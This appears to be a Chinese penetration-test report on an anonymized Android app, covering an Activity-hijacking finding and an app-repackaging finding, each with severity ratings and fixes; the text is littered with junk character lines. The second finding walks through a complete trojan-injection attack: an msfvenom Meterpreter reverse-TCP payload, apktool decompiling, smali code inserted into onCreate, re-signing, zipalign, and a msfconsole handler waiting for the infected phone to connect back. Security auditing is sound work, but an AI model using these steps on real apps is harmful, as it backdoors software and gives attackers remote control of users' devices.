表1-2 测试结果 ) y. U9 k7 J+ Q4 M
}. }$ y. n" S ~5 S0 H
6 V v9 V- t. }% C6 N$ d! _
# Y4 a" c8 u K9 @! n
9 A h: g- r* G% f4 u, V* a8 k
2 |& _5 x& s/ w \7 v9 v
# B Q; A, R2 O9 R8 d0 |$ L
1 v, X) j* w- x3 D! e; w0 I
# X: K$ c5 l) f+ v, y
( {# E6 s4 j% `# R % ~' \0 `. Y8 U' m5 n2 G' c
! L7 \( ~+ m5 @) S- Z: @% o' [+ E
2 检测结果
7 [" H9 h9 h) x+ m: [* D
7 O D! D2 _# T
- z# ~. B% O0 a. B4 U
8 f) V3 }$ _# v% ^
7 ^8 z# E/ B1 I# B- p1 @8 C$ @. L
4 Q# \; p6 \8 \ 2.1 某某某
/ t: w) D B) j& @2 c9 d0 U% d, g' m; h
( _7 C: C4 j/ j" m8 O! D
- ]0 D5 B9 |5 {/ a) @0 A4 d
; O9 {: ^! M9 }' k g$ H6 ~
; h: J5 y5 Q! _, A0 \ 2.1.1检测目标
" v- Q5 ], |& Q/ }; C+ u2 C1 p9 E# ]6 m0 h/ c) J: G+ T
* w$ r$ L1 D& X
$ t6 `) h2 N/ y ?
# F% _" B4 F6 r0 n3 i% F
1 x2 X- _5 l z8 b2 W, p# h 目标地址: 某某某某某某APP
}8 |' j# q7 S9 V" K/ M2 J& N+ O6 U
! N. K6 w Q$ Q9 c6 M
6 p/ {1 ~2 S4 ]$ o4 [6 w0 G & y' c6 H8 s$ q9 |0 x; i. Z, [
) h/ t+ U3 U: q) D$ T" c
2.1.2检测结果 ( P2 Y0 \ m: A" t5 e0 S4 S
( n; @$ e S4 a
" m5 {- O* ~5 H+ m
+ T# H# Y j( F, N
5 l9 w7 W/ \0 A
" ^' {3 t3 F# \ 2.1.2.1
, _% Q; ]/ F- \7 T) l" x" R9 h- e4 j
0 N }1 D$ F1 ^6 ^& g- w! p
4 b+ K9 W& V+ ~/ F' W, Y / R% g1 J% g+ a) Q+ ]
" V; v! K$ ~2 y/ r( z2 c0 U 漏洞链接地址:某某某某某某APP
+ B ~% S: S: c" w5 \+ m
7 R9 J0 w! N. g7 j' h
9 m0 ^# G3 c) b: s, n# `" t
% ]! U, G- F& ?% C0 i) N/ f& ]- X 2 N8 u( T/ {& [0 E8 @. j
) a) @. W2 w) T: ]5 R" S* a
" y# l9 [. a. _- N$ o' d( \" R3 e1 D: p$ E/ E/ ~1 X& I
$ v; j1 ~% E2 ^) G: W7 o8 S; ^; V7 F( c5 X- h7 S
; j1 E0 J, J* T+ |) [! _
; _/ S3 r7 n5 L; u; L 漏洞分析及取证: & |( N- C* n. r" [
' h8 |( L5 J" o- r+ s2 Z$ F& Z1 C
. \# i5 ]0 S- `7 ]6 ~0 d+ i, z! k
7 N% G9 E1 d1 u
# ?, x" N5 A2 n% d0 t/ t3 X, i4 q3 I6 m# x( h7 `' z9 }
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
8 J z, w% P5 A" s& t4 m' ^$ M
" F8 ^: Q7 E" ^" [& T
$ M, B1 e, C p
; _9 G8 T. K! l& G+ W7 F6 D1 _ : m# [0 K: F6 h% v# @ m
; i' W3 X: y- w* h
2 Z) Q( K5 l- r# K8 n" `. g
2 Y, P! C9 Z3 c9 I, k. B) G! t" t( e
7 B) g; J$ Y" L4 S1 Z7 W7 v
8 _2 F, G6 @* U( K& }% h3 J( L
% f& o0 k$ f/ I/ r
# @7 D; X& a4 m# h$ ~ 1 k- B( q: v& ?6 I9 [
# n7 [2 s& ?& `2 W
7 W/ n) {& K! A3 M
+ \) ?: t& D9 l( r
, u# f. x* k% B' ^/ H g* l
! s4 R; S1 h) Y8 P
, V3 \( ]9 Q1 H5 P; h [8 e8 I! t+ N
! o6 A; K& f- ~3 \9 F# _0 ]+ G
1 y( |5 b; y6 h
9 q$ {0 m, k4 S. w
! s4 s! B3 L9 d M. l) X7 }# I5 f, w! l0 B5 K
8 k/ G) F' G+ t1 p: l
& n7 _' S- C) c4 E% Z1 f( H
3 o5 u( q3 l2 j h: [: K: @3 R# @- Z
0 u1 C9 C7 w: I: i# e; q. N3 ~
+ ?6 ^5 s3 ~& u: i
( X% r: y- }7 C' k0 D' w
4 U' _ s U) o! I. `( t% L' n" Z; k% s5 P4 Y z' X6 Z7 a
, k4 g9 d& N5 e/ D5 B' d
2 N2 L, U1 E- ~8 E- G' v# @( b" B$ L # L2 w0 O1 A3 S9 L
2 q+ m9 R; V& a+ p8 E 漏洞危害:高
2 }& i* Q/ B5 {. Z2 d( E, B9 q2 Y; l( Y
2 |2 m, D# q. \# ~- Q
! |6 ~' |) D( E; ?9 O: }
: X2 C) u' U+ S7 ^# u
" ]0 }! b; H) w( Y" t* o& B
: ~' l, L9 d; L' k5 ~; @' \2 p: h6 o& Y7 _8 X4 T4 ]0 e- O2 A
$ q. h% j, ]+ L7 m; d# W( x+ h$ F( G
?! s# v& c- E3 t6 \2 |' v9 O, Y @8 ? h6 g4 V' m9 _( x8 d" q
5 ^8 N9 t" E2 m! o0 O' ]1 E
|
& Q/ r1 N- @/ e9 O# |: I. d1 `$ }' E' H/ `0 l
F g$ s8 s6 D* I
1 o7 c$ ?& O# |# Y5 j- t5 k
严重程度 , f& s4 U$ [! `% F1 k& j. F0 y @
2 b# x; F) O% p: X& g# ~
$ X+ f* r1 p" N5 k2 Z
; o f: b8 \/ S: D8 z) j+ x
| 1 i' f; g. F0 m6 K2 A7 G5 _
1 L$ T9 }/ ?7 U 1 m' Y& W* n/ s& g6 y8 ^1 u
* m0 R- R* I8 w; m. ^1 ?: D # y! ^! f$ M" K m1 `5 \
( }& W( b5 h$ | A6 i! U. L 高 9 i- G; M2 d9 T4 m4 C% C
. `4 {9 n }( I$ {2 O& s+ b8 w
0 |, ]: m! T! Z6 \ s) O
8 x4 g) N% T( F1 X# p | , \6 T: O5 U/ l- {/ J
8 Y3 H6 n& V: |0 C% t+ k, v
: Q" T& J6 x' g; q9 `
& t1 U# x7 Q V' p6 P
# |$ E: F" _' @* k. E X( g* X& M% w$ ^4 f- U
■
& I. |# j B3 _/ C0 d% W
) s/ Y! L' S( G/ f- f/ r 4 p- e: C' e" h* y: T
* u2 P2 m% g3 B' P" m2 t# T | 7 _* s% l+ f9 E3 v8 _5 q; u
! D0 I- A/ W3 @( i' G0 V7 S9 s
# R) b4 ?* c8 c# s& f: B* p
: I7 w4 ?2 D3 I: d- m
5 h4 G) n8 f& f8 o I2 K
' `( Z1 P) w1 y% A [4 K; ?% m 中
% ~" N6 ], c% M2 V6 @" c/ Y0 G3 A( e' x; m/ b
: e5 L1 F: k0 C I) y
( D" ]0 K& g2 w: t | / W% l+ ~: n' l p! R6 W! ?
# R; i3 H' k' h$ W
6 U' `- l$ L# n9 y* y* F0 D. E) F$ F1 g5 F6 N3 R1 ]" B
- V4 r( `7 w& _. p8 @
- i/ y, a% N' }/ i# k / G: p$ t+ V/ p5 G3 r
# `; a0 m1 R3 G
' d- L1 h: ~5 m
4 y; E- C$ U' g4 W# m$ D' V5 n% } | 6 H; V" P; O/ k4 c
. F9 x1 [3 O& \ . Z6 ], v# \9 Z
/ v! z0 H' ]1 a6 |5 h) H9 F
2 l2 a) s. K1 m& F$ B9 W! m
; e) I7 ~- h+ W. `/ ]
低 ( ~" B$ q ~' ^ r! F- b
% D' L# h9 h$ y4 h' o8 ~/ E
9 }9 ?0 h6 g/ J; V) S0 I0 ~6 h" m' M* V2 ?5 L' W2 C9 C$ Y
| 9 l& G- m6 [. t7 E1 ~
$ _2 x) M- `& h; t7 | - d5 ~$ }$ [% P0 L
3 K0 {7 p( J8 v0 H% y
% @* R* \5 U& T& ?/ l" o) D
. s8 F5 k. C5 W# [' B) ]* H 6 \, I- O6 I0 @1 l: B
& q+ I% K6 n, `. c- `1 i. `
0 Q8 ~" o9 I2 x# d8 e$ s
% Z& m( @( Q- `) b
| + g0 D( T( t' j0 T
+ \/ m7 | U! N# e( ]
J8 A9 L% V" B1 T3 ?3 Y
( _1 j& o1 I0 f* W; O" `; G
1 [, Q, A! ^. Q4 Y; `0 T$ k" W' K7 k. C+ F7 v
) M; p7 y2 c! T% ]+ q8 {
0 x5 ^; \2 y( m+ |8 q % q3 t, |2 _/ o
0 T4 l! M8 @5 r, `. e3 M
f7 Q1 q! e/ d
$ J+ Z0 r4 W/ v) t6 @
- i! P6 @; Y. m; Y+ I
& b( v8 h3 t3 _3 X
* I5 F0 g$ O0 Z7 b9 T5 m2 v6 ]9 T1 \7 @4 p" W
( t2 {& H& b& a/ c6 F5 R' v0 d1 c8 F. I
" I9 i& Y# D1 {( J7 c0 N; i7 ?
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
2 J% p% ?) @- O+ q7 k* I& |/ t1 d( b
, Q* C R$ X; P) u- }3 C8 z1 V0 C5 j7 v3 x( I1 a0 k5 a
* U- `2 @6 a9 I! R3 p$ X. n5 ?2 b4 N5 F- N8 o
# X# T: i/ b( h5 q
5 H# B4 s# @: H" ^5 E
7 z( q- ^9 @8 ~3 ?; D9 ~; S
1 k8 S y# n; q# j & j4 v9 l- [. `$ @1 b g- P. f
7 F3 n/ ?6 H( A; \ ) r3 d+ ?6 N$ r( h. N& g) D
6 F& Q) j# f2 U6 z* M U# w
/ o$ J4 G& w% R5 @ d' o8 \; D1 ?- {- v- ?, z/ h
1 E1 Z5 v* S9 O2 Q5 h, `2 w$ ^$ I7 F$ Q. {4 C7 f
2.1.2.2 5 v! u5 J/ ?* Q
) D' g' }& J# Y, J/ D4 X8 M
4 P: z2 I: A& o& N5 s( ?
; b% f# e7 i$ g4 H+ p
' R9 G5 _. @/ \
7 Q9 G4 |8 B7 Z7 }; n7 T 漏洞链接地址:某某某某某某APP 8 F, c' I. m4 C: k
/ h0 v. k& u+ |1 u5 i; T' g
; k, x$ S" Q+ Y% ^( ~, k8 {: o- N' ^
, p6 O3 P# r9 S& E0 d/ B0 k $ y8 `; T, R. P3 x9 w1 ]
9 p0 |( l: L" X$ g, A4 l* _5 J
漏洞分析及取证:
' Z% u7 R0 w8 H6 p4 V
. K3 [( D. E% K% O2 t
' G1 }7 K+ l+ Y6 G
* f! M b# \ `' j/ T" |
* F# {/ Y& l( H: h2 U' k4 M3 o/ X
& X# D! y0 F: N! N7 y% y 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 j6 H6 h/ _9 T
: W6 d( ^+ \& Z+ E
$ {+ L/ f9 Y U+ W: a- N6 h
5 q" T" C3 g' H% a0 D" _" R ; h% y: M0 G+ ~# V% X: I d
. w }$ ?6 A6 T, L2 g" G h( F
用Metasploit 生成木马 apk " n Q! B1 w% ^3 K" E
& K6 j! y# Q5 B: F* @
9 f& v, P, q0 ]
4 N5 `: p* g" ^; i
' y0 I1 w- w5 h! `( ]& L! M% R# S
0 O( l. o3 \+ R' [% }1 F msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ' F4 P% a9 }! c* ?' A5 V% t4 c) k0 v
L7 _/ n# f5 w
1 i3 y+ ^! j: X! s) T% a h% k1 M0 ^
3 ^2 B/ L8 N% J" j2 u, y ! k, Q1 A# ?+ K& Y
9 ~, i2 L/ |3 |5 P9 o1 [/ N 反编译目标apk和木马apk
$ V4 \5 _$ s3 u4 a$ T2 {& |7 c6 L( J9 q' K
0 O( C, {- |) C' l2 r
0 j, N; H. I# l8 {5 v* _
8 P; G+ Y5 w, Y5 {
4 u6 d( Z$ O* L' x apktool d target.apk
8 e1 T3 s9 B7 Y3 `
5 V& {& j* s5 F6 E8 t. R( }' I7 [ apktool d cockhorse.apk
5 h0 h3 @! w R5 \# g9 ~& ^2 q: r' C# A9 D1 k& a9 p# J0 S
; y) { `; Z" g6 L9 N, T+ f0 `- E; c
6 a8 g" \, x& I! I1 f9 r. b # w1 B( s- h; A
Z- S- L1 y8 L" E/ a3 h4 _ 木马 apk 注入目标 apk + T( f8 _! j/ \ x, ~- H- L
8 Z; e- m: i. F/ ^! Z, t$ W1 Z$ j" r
5 X; c' E7 y4 S2 t7 U$ V
! c; F4 G6 p# ^6 B7 g* L
( J! `1 Q# [2 g/ N( k
+ R; P& V7 m1 M) d, _2 L" N 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
8 N, o4 r5 [4 [+ O3 a5 i$ ~" G
1 s0 x" e! s) k invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 4 D1 w D- ?( F
6 |# G1 w j I1 D6 X( f% Q
( j: U& A/ j) X( j! M( s% n
% n+ c! m1 @( U9 d
3 D. p- x5 @1 `& m7 {. h. h* l* ^) f9 w9 h3 I+ x j
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
7 s; b- h2 i: A- n* W/ p+ Q, U" d; N2 U9 C9 ]
6 k2 }* `$ f: ^9 a
1 N1 k3 g- }! h8 t2 H
/ f5 D {+ v" ^4 Y% }
/ Z" n( ~* i( d6 Z. Q' B/ v/ r3 Z
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 $ V) T% y1 a$ H- ?9 P
8 S/ _0 `/ d+ ]9 T
0 ]: F. P ?, ]- ?1 m% _+ p; B7 P4 |- f& {& d
6 d5 g6 w/ ^. g
9 r9 z5 F" @, f. q. V* @ 回编译生成最终 apk
1 n( |+ D" k5 t/ {& \3 s; ^- \5 g0 q! F
; Z* X4 H3 G$ T4 g6 @
9 A$ g2 K! v* X$ y ?* C 3 W: n4 }" {, H6 l" o0 `1 L
& l0 U" t6 s6 h/ U) `$ r
重新打包
" l1 Y1 B: a. | V0 \6 p
+ T g* D3 K5 d+ l6 {0 ^
o1 n, W4 G9 T/ O5 ?' B
) f* n0 q$ e# u* U& m' p' j9 ] 9 v# s5 {7 T5 e* s4 I
' f* i9 w! h2 E$ o1 \
apktool b -o repackage.apk target_app_floder 7 ?# c5 J9 t" Q4 J3 a" Q+ c, t) i, ~
! O! a5 D6 w" }" d" I3 F, Y9 o
: ?+ g; ^! z0 F5 D* ?+ ~5 y M/ ?/ V$ e, r) \) _) v/ s4 l; X
# R: \" d2 `2 g1 p" p3 P
g3 ^2 H) Z* ?3 p U* Z7 ~ 创建签名文件,有的话可忽略此步骤 9 c; C5 u% S- S0 {+ L+ k) Z
$ q. X7 J2 f1 V o( k
; u7 B( G5 n4 B8 N. `- b
[+ Z2 |, i% b5 H3 a
, H# y* v- U5 e" Q5 U. F$ h. C( R
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
3 n; |; k: m" ]7 N+ {) {) r0 \# h, O" x9 h# w6 J% R( N
9 M+ }: H8 t4 ^9 `
2 r2 }4 F: N6 b" N+ x
) }8 {( i& q3 a. m0 I
$ I- i9 N' i4 ?9 ? 签名,以下任选其一
. @" R7 j: h5 C9 \! L6 ]
! ~/ `# A6 |7 x1 M/ C7 ^! i
8 y, H# O6 y$ A" e: `" o- A3 r
: {# F2 p8 h& @' D* i: \ ! |: A6 `7 Y7 u+ `- g: R3 \2 _! K
+ |' Z( _& r" q4 c) Y
jarsigner 方式
: j& f8 N5 q: ]3 p
" K: h& n4 w& M& I# Q
% P5 r4 x0 |0 l
1 s& p6 {0 E% h( N& b* u
. R A7 x! }* c6 n* Z" G1 }( g, i$ [5 x
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 y* o+ e5 |4 }* v3 V
# ?* ?! A: b+ s7 |" I( `0 v
: a7 s: C+ T; p O, v
0 u1 y1 F5 T0 i$ | , s2 N- ]5 v* x% P3 F, E) b
2 _" G/ t/ X8 L1 [# t
apksigner 方式 ' k0 T* t/ g' e2 \
m% ~3 B. L# A; D+ D" F$ R
; h4 b; g; X, W! X% k7 l- U) z8 i& X
. {( y9 o. S" y" \ R- U- V$ A& X0 L; y
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
" ?* b8 v; ~& b! Z
+ G$ d x; H5 H( o' J
+ w8 h9 i3 r, `* a6 V& x% `: }, w- A
% e# C; e0 r: ~9 X" M8 e. | 0 \" R/ s0 B$ z% ?
0 X. v% h9 w; M: t& U ?
如需要禁用 v2签名 添加选项--v2-signing-enabled false 5 A# n5 [2 M. W* J
; \6 p3 G; Q+ f' _9 j
/ n: p: i" x% _2 J, B" {: A& w2 a& T$ `4 ]' c' ~6 A
% R0 _* D( @8 `+ S$ [
8 Y' h+ H7 @) b5 \3 z( D 验证,以下任选其一 # ~( s' f# \; ~5 a% [* f
7 W0 e. f# p- {
$ ^! V8 `' {$ \2 B$ e0 w" f
# u* @' g- C9 R
# I: J7 B& s5 L" z( [ B
' O. } u! M( l. j# l jarsigner方式
+ S& B9 c) m3 e! L
) m8 j' P7 n# B2 I; Y2 l7 e
7 a4 D; o8 H" J! A- i5 |# R5 u! f" w" Y0 ^0 v. `' C
7 |$ V/ K: Q X" ~1 _
) j* J4 N7 a. I# G, f jarsigner -verify repackaged.apk
* c ?; @& A2 n! ~( \& D: g0 t* n" g! x9 `. _# N6 j
: U; ?' I5 s( p, s! B
2 z/ \3 V: K4 M$ \* J
+ e9 {) n H4 M: L; R, ?4 T
$ u3 _5 m. R, c3 b6 Q apksigner 方式 ! w8 t* R1 d: o$ }
: k L5 i3 k: Y; j5 Q8 m
7 O* D1 \6 {& J2 O9 x
4 \6 N+ a0 o; ^6 w0 m" y( a
) S1 z y* @- n- L
0 e/ w2 i; P, Z. k0 B+ y0 O& ` apksigner verify -v --print-certs repackaged.apk & [# F; b! p' N
i# }8 D V" [( }; y6 i' h" E
1 e5 m0 R! N0 g
4 y& w ^, v ^) a1 x0 t
4 Y) j7 a" m- _# b! f' H
3 y1 z% x9 b, n. O3 v+ F" B
keytool方式
# R" M- ?# h' \5 L. Y
" t, i4 u2 g1 B; @& A
w: W7 `- Q* p/ c$ y
, }/ H; M$ e' R0 T1 {
$ w* d8 `1 J) J; f& a
/ I# V9 {8 z' Y# I3 D: n
keytool -printcert -jarfile repackaged.apk
# L: s$ q3 x0 {8 d H( [1 w4 `( x6 |& F1 [$ t+ n
6 l2 Y# K: I/ R( C
" ?6 `& e0 G; c9 ~7 _ 1 u" n6 y& |/ ~6 r5 q
' h3 U, t- ?( d
对齐
, a3 f4 m) r Y/ E* t" p+ \9 b2 q! d8 F0 D3 j4 L
" M' l; N l6 ?( n' g
( q6 ^) [0 d% J ( G/ q# O9 t8 y" V% }# {1 V1 W' F
; m: o5 F" G$ p8 w0 D$ A
字节对齐优化
$ w( o% k; L# N/ P
9 z, y7 b4 e/ L7 j, i
9 j. |5 B) D, D I2 l" @5 o% u% ^. [6 W2 I+ ^1 @8 M" ]
`% W& N' v% q f
. i$ E: _7 l! i zipalign -v 4 repackaged.apk final.apk % t- ?7 q, T, o0 o" t3 k( l
. d1 U' a+ }) s: O ?# N: @' C7 ^7 [
4 \3 c$ `5 Y5 }: M6 i) P- g1 P' ^7 G! q- n$ z
7 O$ i. l# g# ]
' S" K4 j) B( i 检查是否对齐
% b; h! Y! K# I5 c1 V7 c
1 W5 x& e4 N4 s3 d% b
- u; u0 f, j$ y. I+ n9 q. Z' n% E) L; m3 C4 Y E
, \- H7 J% p' }$ {* N! L* S5 @/ C8 I4 ^+ G1 l" Q
zipalign -c -v 4 final.apk 6 D+ P: K: ~& s2 o' }6 D
- @& H5 P; ]! ~% S$ Z) c
9 C& `7 [( u8 A ?) g7 M& I/ h7 A) ~8 k6 e& U: P" ]6 ~8 L% b
7 b4 ^" g. ] p5 { k$ _8 ]
9 m2 D; ~+ c0 U" X; _$ U 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
% {+ A: l8 J$ n( y
+ e! R2 ~) X5 ?/ K8 ^/ {
! z" j* y% C7 B& |1 K; d8 K* H* @2 l3 T/ r2 l3 O
, t3 m' z" x, b
% p9 `' {" h w5 r6 s4 M
启动Metasploit控制台,配置参数等待上线
* Z6 [" N3 G, T9 |- w o
. B w) v3 k! S$ N0 }* U
) ]9 y; e a" g8 E
) K3 E O1 l; D: r5 M; v7 F
2 ]8 L6 `3 A, U4 \
, K% }( E2 C& K# K. { 在终端依次输入如下命令
% R6 I) y; X) p$ M& S" t9 [9 J
' T) t# c! C) c
% c% Z6 E2 T) S5 y$ s( `: W
* p3 {, ]' H3 i, D
4 H/ b q" z8 } r) h1 ^6 s; a' r& o2 f1 H6 j. d2 ^8 J
msfconsole
' n9 n! E5 Y+ Z) D; q w, e, s5 O7 _/ H7 j
& r8 V1 {. |* B
/ h/ N9 Q; a; w# m0 C9 @2 K
$ ^- ?& Y# n) ]+ Y4 C2 r4 t5 f* ]) Z3 N/ W; V# S; U8 [
use exploit/multi/handler 7 p5 U6 ]! E. w: l$ N
0 q, f7 P# K9 R# u, g1 o. \
" _, \/ B& X' Z; S/ C. O# h) n9 T0 t6 |: w3 R5 j6 y" C2 b" f
6 v* m% n$ x& n" v" T. ]
. r! [7 L6 E8 m; t& i% f! E/ j set PAYLOAD android/meterpreter/reverse_tcp + w$ Q! k2 S6 g5 D0 \
( G2 H X* T7 } S& ?( L9 L6 @+ m
2 E# K# Z& N' W: a, S( K/ [# ^/ |. N7 H* c
0 D: O( M; Z$ b& S: m& ~3 t; l
3 c O5 h% S9 T set LHOST 192.xxx.xx.xx / I# y; r! `( H( C, V5 p4 e
9 _% F# A) c* o4 t, F- P
5 ]6 A( d/ R% J# @$ x1 f% ~
& P& S t3 ^8 G ' V$ Y6 a+ Y% N# F$ v
* @, N+ k# ?* g- j0 u3 o set LPORT 4444
9 z! q6 E+ o$ y: ]. j8 z
# s$ X6 b$ d2 Z! a" [
5 q% g; Y8 R9 w" k5 W% f
6 u! [2 `' i6 R; t , [" N8 S1 p+ M- m5 S" s0 e: l& @
+ K0 ]4 O! k, @% N3 @- g exploit
7 r. V3 `8 L v' ?6 |
0 z, T0 |( I8 v: ?: v
" i: q" n; H, G6 @6 X
d, X- ]# ^& G- x) ~# _4 c
5 j' I1 c6 S# j9 j/ g4 O. }; u; g: j% B/ z2 E/ B4 a0 K
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
: w) v6 s4 v+ X2 @
* ]% P2 n3 m# j
/ X! B) D: E5 S5 E
7 a4 `0 u+ F/ v5 L& ^+ a! E
$ U0 R: T L7 S0 D8 [ o
( z: o) b# q1 I- M6 k5 a 漏洞危害:中
5 X* r5 T- y% p3 D% a. Q- D, R' N0 v; L1 K7 D; U2 N* R
! w3 J- a; O) c7 _1 w9 g
9 D! I3 \' |; U! b5 }- y
F R1 i% T: Y9 J
0 _( A2 o' i- E0 s x9 C# s% W
6 H( ^6 g4 s( @# P# p- w" c- S: g- t6 C* v& T, d0 C5 ?
" z2 c, u }8 H; Y7 ]
. J/ k5 B4 V- b9 h7 ?" B- ~' y
( Y. P2 `/ p) ^3 }
" B( I2 k3 ~# W( g- @# H) r , j3 r+ {0 Y E1 b
1 O/ ?- Q8 I- [' U+ I: t | : f& c2 t7 n+ z+ X6 r) l
) W$ V/ \' | B+ I+ R8 [1 I8 y
, `+ e% q* N% |; |4 H4 ^
& W& k) s" Z8 C+ i+ G0 w$ `5 q. A 严重程度
0 N4 M& P1 N, }/ d9 L* t* X5 }! `5 \5 Q* ~0 b2 C7 }# F- g
2 o; \/ I: X) s( a
6 n, A( v3 u; `; j5 {1 F. I |
1 C f! v0 k& [! s0 _2 m# x# j8 @/ d m8 c) Q. S1 C: p. g3 x
) v5 i& D8 N6 f+ l
; E3 W, R9 g' C. Z) J) L0 ~" i
5 x* I/ ?- m: q) o& | l, s6 N
1 T+ `& |+ ~3 m! g 高 * N$ S0 L+ \3 A l; j
& h }9 c/ P0 {' O/ K L6 \/ q# [ _4 n3 }, Q( D9 p1 y- R
3 {% i5 G" [, p, q$ v |
) _8 J+ z& r E5 S+ {, e/ ^2 G- h$ M8 q6 M' d
8 t% @2 h+ v2 [7 M q
( J/ T# o# \9 v) `, e k C7 K* I4 e4 L" W+ |
# y, B3 ?& a$ c
■
5 E. j4 N8 S$ B9 F! J1 h' \ e" G' S; P/ z& z8 s2 Q8 a
& X. z; a: Y- C
6 K5 y" q9 E' c | ' u3 V% @" f/ z/ s/ _7 w
; P1 U* [3 ]! L6 V& ?$ q
9 K$ A( C2 I. ~ q& M) r3 h8 K& n5 F
! \. S* W9 T& k6 t4 X; X 9 b% P3 t% N3 L& C! u
$ M& I% K& @3 U |4 ]. u# F3 `
中 4 N! k* |1 g+ | ]. b
' E* W, _/ M- U E( ?
2 ?7 t+ _7 J8 _' }8 `: H0 e1 i1 ~+ `5 {7 |+ M ^0 T/ N7 h
|
# l) T9 j% t3 R4 L& F: J# L2 v' Q- q
5 h' ?0 A. K+ L. ]0 X8 U2 w# \; M ; x# F9 E* Q l V8 O4 l7 x
6 z3 `5 n, o* l. ^
9 x/ {1 V9 a! \4 X3 f. p
! q( V/ | x7 X; R 1 g# b. f/ O( [5 f6 a- `' {
8 C: l3 _! @0 x: z* k
/ L# H* E/ G( P, }
( S7 L4 y) P; @8 u0 ]
) k- l, v) P4 I h8 I! a) S! k" ?0 l6 ?5 r5 ^0 |% e4 G
|
+ r! O8 Q) d+ i/ S" {1 Z
0 f( F. q1 U0 g3 Z ! @3 |) {8 G0 J' M) k9 c
2 v# T* x9 }8 g$ j5 Z% _( b
+ D0 A/ R( t. v5 ^ Y8 ]/ e- z
/ t- ^( z X( Z% {; I
低
( b8 t0 |) C0 S+ y Q8 \. m4 W/ p& X( {4 d
! v8 J* U6 t4 u _ b, x6 W0 l6 i- c5 [7 C# i( j
|
; h2 k9 x: x1 s( s9 V# Z9 s, g! y) s# e8 \4 D
6 U1 j4 b0 y1 B3 N! g) K& g4 \* [
: ]2 ]/ y$ F. `0 l. Z$ z# R
! X4 c& i* ^& z' u1 u
0 m w& O3 P, H9 s2 o/ g7 R/ w2 ^
$ p$ W- U' [1 b% N2 Z1 y2 s$ o. N
0 g+ C# g4 h& e) v3 m! R0 v; T- j; H2 g2 g2 F3 N) q5 s3 G6 D
4 V9 M7 W: ^3 m/ Y5 L0 R% ]
! T6 K1 Q8 z) G) i | % u- s: N: t. G" M. G; p2 s6 f- J' B
: y: A) p) x5 {3 D3 x/ P2 i
8 x3 l' I4 H6 }7 D, y* X; Y4 t
8 S4 h- q* v( @ 4 Q1 U6 p& e' Q, B
. e: ]5 l+ @+ z/ \: d2 R: c! V
/ w! u1 Y4 W- n% `! G& E
1 t- }. S( _/ N: U; `) O9 g+ o2 Q
& d: P3 b5 [9 `
0 N% m; O G) Z6 [
+ {( D5 r2 u- R; E1 W2 ]/ a
* e9 M# N3 |9 T
- w1 o- y. a5 @+ m2 i A
1 K' K3 l2 I9 Q1 }" A
8 H. _, x0 R/ E- P
/ V% V- t% b9 Z" x5 s2 c. r5 q : s0 ?) q/ y' P* t( e
$ g0 [5 k4 f6 p* D# ?) ^, T
修复方法: # _6 W X" }6 [5 x. m3 e+ x6 E- O
; w, `% I' D4 T: G
: w/ P: E7 B9 R$ O8 H+ s4 a
5 @0 `/ q% T( J 6 f e& x8 p& V/ G
8 b. E) {* Z& _9 m& c. p 1.在 APP 启动时应做签名校验防止二次打包。
4 Z5 r, _/ R: G* Q
, O% ^- A' e' J/ ~% P) {; Q$ \ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 - }! a/ {3 c! {- j4 x
/ w2 ?0 I4 H$ t4 U
$ `5 D/ t6 g1 W* p& _# ~5 P
9 i. q( a8 y1 b z2 v! T: v( F0 N 2 \+ ?. m, [/ N
" y/ i; p4 q; M, f# U* @
* i: p. d& ] t( B1 S, w
7 t0 \ _: m4 _' p/ X3 K- Z
\* m; \. G1 X8 l8 Q$ j
( A4 Z# c1 S9 o3 }+ p) C
8 e4 X4 D5 m' [' u" F
; a2 N; u) a# o. |
# h- x) r) l% i5 i6 a- B* f; m* ]& o3 k) u
" K5 `8 l5 J* H7 _3 S
' C) G% x3 X% a( E6 i/ o# |) H
% A% K- [3 T2 l/ J8 Z0 o
/ c4 b4 n0 ^( S$ }
- l4 f" @0 C9 ]: x5 l0 _
5 O& _: t& e1 J